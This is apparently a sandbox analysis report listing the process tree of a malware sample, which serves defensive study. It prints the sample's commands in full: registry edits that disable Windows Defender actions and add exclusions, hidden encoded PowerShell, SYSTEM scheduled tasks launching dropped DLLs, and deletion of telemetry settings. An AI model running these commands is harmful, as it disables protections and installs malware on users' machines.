C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\RayojNz.exeC:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\RayojNz.exe rd /oIsite_idozA 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2472
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:8
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3496
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2568 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:323⤵PID:3888
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:324⤵PID:1472
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:643⤵PID:1420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:323⤵PID:5092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:643⤵PID:4756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:323⤵PID:4960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:643⤵PID:4016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:323⤵PID:5060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:643⤵PID:4076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:323⤵PID:1340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:643⤵PID:3656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:323⤵PID:5020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:643⤵PID:2596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:323⤵PID:4356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:643⤵PID:4888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:323⤵PID:3528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:643⤵PID:1304
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzIGUsUUm" /SC once /ST 06:42:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:5008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzIGUsUUm"2⤵PID:3744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzIGUsUUm"2⤵PID:3064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AtBWxWZQPczPtNlnn" /SC once /ST 05:49:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\RBmDAqC.exe\" nf /pdsite_idTWH 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AtBWxWZQPczPtNlnn"2⤵PID:312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4624 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4412
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4656
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2784
-
C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\RBmDAqC.exeC:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\RBmDAqC.exe nf /pdsite_idTWH 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4280 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bSTfouYtWkypYZNMeg"2⤵PID:2124
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4320
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:2832
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4800
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KcvIfpBEU\zbMovH.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tPKRaMnTrSPPzpw" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tPKRaMnTrSPPzpw2" /F /xml "C:\Program Files (x86)\KcvIfpBEU\bBhnTyV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "tPKRaMnTrSPPzpw"2⤵PID:3904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tPKRaMnTrSPPzpw"2⤵PID:4644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "adfRLMJfxNTLtT" /F /xml "C:\Program Files (x86)\AtBFliYUSCIU2\ujHgBPH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KDnJrqmubUqQR2" /F /xml "C:\ProgramData\aFeOAQnlubilNTVB\YWNgfog.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QrnxlXQtqLuhZDTpp2" /F /xml "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\esydlRx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "frJpXGSvGdttwfSkGFg2" /F /xml "C:\Program Files (x86)\OFVgegHnELnCC\AsRdPjH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:8
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GZVqxQnXgrdNzWCPM" /SC once /ST 11:32:01 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VeitDxgWDfCRoOtN\iLwYhzvZ\BzHKSwe.dll\",#1 /Ncsite_idJsx 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GZVqxQnXgrdNzWCPM"2⤵PID:1012
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:192
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2444
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:3888
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AtBWxWZQPczPtNlnn"2⤵PID:1480
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\iLwYhzvZ\BzHKSwe.dll",#1 /Ncsite_idJsx 3851181⤵PID:3596
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\iLwYhzvZ\BzHKSwe.dll",#1 /Ncsite_idJsx 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1044 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GZVqxQnXgrdNzWCPM"3⤵PID:1400
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
